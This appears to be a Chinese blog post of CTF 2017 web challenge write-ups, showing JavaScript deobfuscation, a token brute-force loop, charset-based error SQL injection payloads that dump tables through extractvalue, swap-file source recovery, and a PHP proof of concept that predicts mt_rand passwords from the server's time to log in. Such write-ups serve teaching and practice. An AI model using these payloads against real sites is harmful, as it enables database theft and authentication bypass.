Virink's Blog logo

Virink's Blog

Let life be beautiful like summer flowers, and death like autume leaves.

 某CTF 2017
writeups
ctf
 

WEB 抽奖呗

源碼大法

view-source:http://xxx/

可疑文件

http://xxx/js/jQuery.js

AAENCODE & decode

aadecode - Decode - Online

解碼后發現關鍵函數 getFlag()

Get Flag

直接在控制台查看函數

window.getFlag

flag{951c712ac2c3e57053c43d80c0a9e543}

WEB 继续抽

源碼大法

view-source:http://xxx:81/

Payload

看了下源碼,爆破

function orz(t) {
    $.get('token.php',
    function(token) {
        console.log(token);
        $.get("get.php?token=" + token + "&id=" + encode(md5(t)),
        function(jsctf3) {
            console.log(jsctf3);
            if(jsctf3['text'].indexOf('flag{')>-1){
                alert(jsctf3['text']);
            }else if(t<200){
                orz(t+1);
            }
        },
        'json');
    },'json');
}
orz(0);

Get Flag

flag{b81cfec0285f75d4e36d2ccb2f7ec2c0}

Web just a test

簡單測試下就知道是字符集導致注入&報錯注入

  • 爆表
  • select table_name from information_schema.tables limit %s,1
  • 爆庫
  • select table_schema from information_schema.tables limit %s,1
  • 爆字段
  • select column_name from information_schema.columns where table_name in (0x666c4067) limit %s,1
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,32,20) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"
http://xxx:83/111%%df' AND extractvalue(1, concat(0x23, (select mid(f1ag,1,32) from `test`.`fl@g` limit %s,1),0x232323))-- KeTF"

萬能的sqlmap其實也能跑出來

Get Flag

flag{99cd1872c9b26525a8e5ec878d230caf}

WEB Wrong

我就不吐槽出題人的智商了。

get file

洩露文件:http://xxx:85/.index.php.swp

下載,查看,恢復vim -r xxx.php

hack it

用時間戳做種子,考慮的本地時間和服務器時間不同,所以獲取服務器時間,strtotime()轉化成時間戳。

跑出pwd,

session_id繞過$_SESSION['userLogin']==$_GET['login']

Get Flag

flag{rand_afjk_u8nm_uq2n}

Poc

閒著沒事寫寫,以後可能用到

<?php
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}

function get_headers_from_curl_response($headerContent)
{
    $headers = array();
    $arrRequests = explode("\r\n\r\n", $headerContent);
    for ($index = 0; $index < count($arrRequests) -1; $index++) {
        foreach (explode("\r\n", $arrRequests[$index]) as $i => $line)
        {
            if ($i === 0)
                $headers[$index]['http_code'] = $line;
            else
            {
                list ($key, $value) = explode(': ', $line);
                $headers[$index][$key] = $value;
            }
        }
    }
    return $headers;
}

function curl_get($url,$param,$d=False){
    $ch = curl_init();  
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    if ($d){
        $header = get_headers_from_curl_response(substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)));
        $res = $header[0]['Date'];
    }
    curl_close($ch);
    return $res;
}

$url = "http://117.34.111.15:85/";
$seed = curl_get($url,"",True);
mt_srand(strtotime($seed));
$pwd=urlencode(create_password());
echo curl_get($url."index.php?pwd=$pwd&login=","");

End

..............

本文标题 : 某CTF 2017
文章作者 : Virink
发布时间 :  
最后更新 :  
本文链接 : https://www.virzz.com/2017/04/16/writeups_for_a_ctf_2017.html
转载声明 : 转载请保留原文链接及作者。
转载说明 : 本卡片有模板生成,本人转载来的文章请忽略~~